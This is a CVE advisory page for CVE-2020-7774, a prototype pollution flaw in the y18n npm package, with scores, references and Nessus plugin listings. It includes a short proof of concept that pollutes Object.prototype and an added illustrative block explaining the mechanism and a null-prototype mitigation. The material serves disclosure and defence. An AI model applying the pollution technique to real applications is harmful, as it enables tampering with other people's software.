CVE-2020-7774

HIGH

Description

This affects the package y18n before 3.2.2, 4.0.1 and 5.0.5. PoC by po6ix:

    const y18n = require('y18n')();
    y18n.setLocale('__proto__');
    y18n.updateLocale({polluted: true});
    console.log(polluted); // true
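Why the PoC above reaches `Object.prototype`, and what stops it, shown as an added example that is not part of the advisory and not y18n's source code. The names `makeStore` and `pollutesPrototype` and the cache layout are assumptions made for illustration; the same simplified locale store is run with a plain-object cache and with a null-prototype cache.

```javascript
'use strict';

// Simplified locale store (hypothetical model, not y18n's implementation).
// `cache` maps a locale name to that locale's table of strings.
function makeStore(cache) {
  let locale = 'en';
  return {
    setLocale(name) { locale = name; },
    updateLocale(obj) {
      // Create the per-locale table on first use, then merge the new keys.
      if (!cache[locale]) cache[locale] = {};
      for (const key of Object.keys(obj)) cache[locale][key] = obj[key];
    },
  };
}

// Replays the PoC's two calls against a store built on `cache` and reports
// whether an unrelated, freshly created object picked up the key.
function pollutesPrototype(cache) {
  const store = makeStore(cache);
  store.setLocale('__proto__');
  store.updateLocale({ polluted: true });
  const leaked = ({}).polluted === true;
  delete Object.prototype.polluted; // undo so later checks start clean
  return leaked;
}

// Plain object: cache['__proto__'] resolves to Object.prototype through the
// inherited accessor, so the merge writes onto every object's prototype.
const plainResult = pollutesPrototype({});

// Null-prototype object: there is no inherited '__proto__' accessor, so the
// name becomes an ordinary own property holding that locale's table.
const hardenedResult = pollutesPrototype(Object.create(null));

console.log('plain {} cache polluted Object.prototype:', plainResult);
console.log('Object.create(null) cache polluted Object.prototype:', hardenedResult);
```

A null-prototype cache is one common mitigation for this class of bug; upgrading to a fixed y18n release (3.2.2, 4.0.1 or 5.0.5 and later, per the description) remains the actual remediation.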

References

https://github.com/yargs/y18n/issues/96

https://github.com/yargs/y18n/pull/108

https://snyk.io/vuln/SNYK-JS-Y18N-1021887

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306

https://www.oracle.com/security-alerts/cpuApr2021.html

Details

Source: MITRE

Published: 2020-11-17

Updated: 2021-07-21

Type: CWE-20

Risk Information

CVSS v2

Base Score: 7.5

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Impact Score: 6.4

Exploitability Score: 10

Severity: HIGH

CVSS v3

Base Score: 7.3

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Impact Score: 3.4

Exploitability Score: 3.9

Severity: HIGH

Tenable Plugins

| ID | Name | Product | Family | Severity |
|---|---|---|---|---|
| 151823 | openSUSE 15 Security Update : nodejs12 (openSUSE-SU-2021:1059-1) | Nessus | SuSE Local Security Checks | high |
| 151818 | openSUSE 15 Security Update : nodejs10 (openSUSE-SU-2021:1061-1) | Nessus | SuSE Local Security Checks | high |
| 151814 | openSUSE 15 Security Update : nodejs14 (openSUSE-SU-2021:1060-1) | Nessus | SuSE Local Security Checks | high |
| 151765 | SUSE SLES15 Security Update : nodejs14 (SUSE-SU-2021:2354-1) | Nessus | SuSE Local Security Checks | high |
| 151758 | SUSE SLES15 Security Update : nodejs10 (SUSE-SU-2021:2353-1) | Nessus | SuSE Local Security Checks | high |
| 151745 | openSUSE 15 Security Update : nodejs14 (openSUSE-SU-2021:2354-1) | Nessus | SuSE Local Security Checks | high |
| 151727 | openSUSE 15 Security Update : nodejs12 (openSUSE-SU-2021:2327-1) | Nessus | SuSE Local Security Checks | high |
| 151723 | openSUSE 15 Security Update : nodejs10 (openSUSE-SU-2021:2353-1) | Nessus | SuSE Local Security Checks | high |
| 151656 | SUSE SLES12 Security Update : nodejs10 (SUSE-SU-2021:2323-1) | Nessus | SuSE Local Security Checks | high |
| 151655 | SUSE SLES15 Security Update : nodejs12 (SUSE-SU-2021:2327-1) | Nessus | SuSE Local Security Checks | high |
| 151650 | SUSE SLES12 Security Update : nodejs14 (SUSE-SU-2021:2319-1) | Nessus | SuSE Local Security Checks | high |
| 148534 | FreeBSD : Node.js -- April 2021 Security Releases (c0c1834c-9761-11eb-acfd-0022489ad614) | Nessus | FreeBSD Local Security Checks | high |
| 146802 | CentOS 8 : nodejs:10 (CESA-2021:0548) | Nessus | CentOS Local Security Checks | high |
| 146638 | Oracle Linux 8 : nodejs:10 (ELSA-2021-0548) | Nessus | Oracle Linux Local Security Checks | high |
| 146637 | Oracle Linux 8 : nodejs:14 (ELSA-2021-0551) | Nessus | Oracle Linux Local Security Checks | high |
| 146548 | CentOS 8 : nodejs:14 (CESA-2021:0551) | Nessus | CentOS Local Security Checks | high |
| 146547 | RHEL 8 : nodejs:10 (RHSA-2021:0548) | Nessus | Red Hat Local Security Checks | high |
| 146540 | RHEL 8 : nodejs:14 (RHSA-2021:0551) | Nessus | Red Hat Local Security Checks | high |
| 145990 | CentOS 8 : nodejs:12 (CESA-2020:5499) | Nessus | CentOS Local Security Checks | high |
| 144390 | RHEL 8 : nodejs:12 (RHSA-2020:5499) | Nessus | Red Hat Local Security Checks | high |
| 144372 | Oracle Linux 8 : nodejs:12 (ELSA-2020-5499) | Nessus | Oracle Linux Local Security Checks | high |